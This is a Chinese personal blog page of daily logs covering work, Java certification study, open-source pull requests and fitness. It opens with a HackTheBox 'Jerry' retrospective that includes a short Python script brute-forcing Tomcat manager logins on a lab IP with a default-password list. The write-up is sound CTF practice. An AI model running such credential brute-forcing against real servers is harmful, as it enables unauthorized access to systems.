1. 复盘2020/03/20的 HackTheBox Retired 【Jerry】，梳理失误点

1.1 gobuster滥用

实际上应该直接nmap出来是tomcat以后就上去草一下几个常用页面。

我当初的想法 是 很可能已经封了一些 所以直接gobuster看看有几个活着的

现在想想有点想多了

1.2 tomcat猜密码不应该手动，而应该上弱密码库上自动化件直接爆破

1.2.1 爆破脚本

（其实没什么技术含量 就是直接http了……）
但是写这里的话下次可以复（来）用（抄）

1
2
3
4
5
6
7
8
9
10

#!/usr/bin/env python
import sys
import requests
with open('tomcat-betterdefaultpasslist.txt') as f:
for line in f:
c = line.strip('\n').split(":")
r = requests.get('http://10.10.10.95:8080/manager/html', auth=(c[0], c[1]))
if r.status_code == 200:
print "Found valid credentials \"" + line.strip('\n') + "\""
raise sys.exit()

展开全文 >>

今天极其疲倦。且心情不适。大概是因为太久没有充能……会早睡。

啊啊啊玩htb玩上头了！！！说好的早睡不见了！！！

1. 上班

2. 继续学习《设计模式之禅》

3. HackTheBox Challenge 【Weak RSA】打掉 (完全没看tutorial！)

直接搜索kali rsa，观察搜索结果，找出很多人推荐的轮子RsaCtfTool

从github获取安装和使用方式并使用即可

展开全文 >>

1. 上班

2. 继续学习《深入理解Java虚拟机》

3. 继续学习《设计模式之禅》

今天休息了下……累了

1. 上班

2. 参考commons-vfs人的意见重构bug暴露测试用例

https://github.com/apache/commons-vfs/pull/168

3. 继续学习《深入理解Java虚拟机》

4. 继续学习《设计模式之禅》

5. 学习1Z0-819相关课程若干

1. 上班

2. 塑形课

今天练习核心……被教练夸奖进步显著，开心

果然 很多事情 只要真的想要做到还是可以做到

再次确认了自己还没有弱到认真起来了还没法减肥的地步

……必须在今年内把双下巴剪掉，还有肚腩

腹肌的事情倒是不那么急 可以拖一拖

展开全文 >>

如果现在的自己还不行的话，那么就再努力些，然后再次挑战。

如果现在的努力程度还不够，那就再多努力些，然后再次挑战。

TRY HARDER.

1. 上班

2. 社区事务

3. 学习OSCP相关课程若干

1. 上班

2. SDL_GameControllerDB_Util发新版本

3. 更新xenoamess-commonx

4. 发现commons-vfs的bug一个，并提供UT

否掉我的toFile方案，自己实现一套，然后被我抓出了bug？

呵，贫弱

https://github.com/apache/commons-vfs/pull/89

https://github.com/apache/commons-vfs/pull/168

5. 学习1Z0-819相关课程若干(少量)

6. 尝试优化博客构建配置:使用自动构建插件来替代在crontab中每次调用hexo generate

1. 上班（半天）

2. 塑形课

3. 学习1Z0-819相关课程若干

4. 学习正向代理

5. 学习nginx

6. 学习jekyllrb

1. 上班

2. 塑形课

3. 制定学习计划，在4月25之前考取1Z0-819

4. 学习1Z0-819相关课程若干

5. 美化博客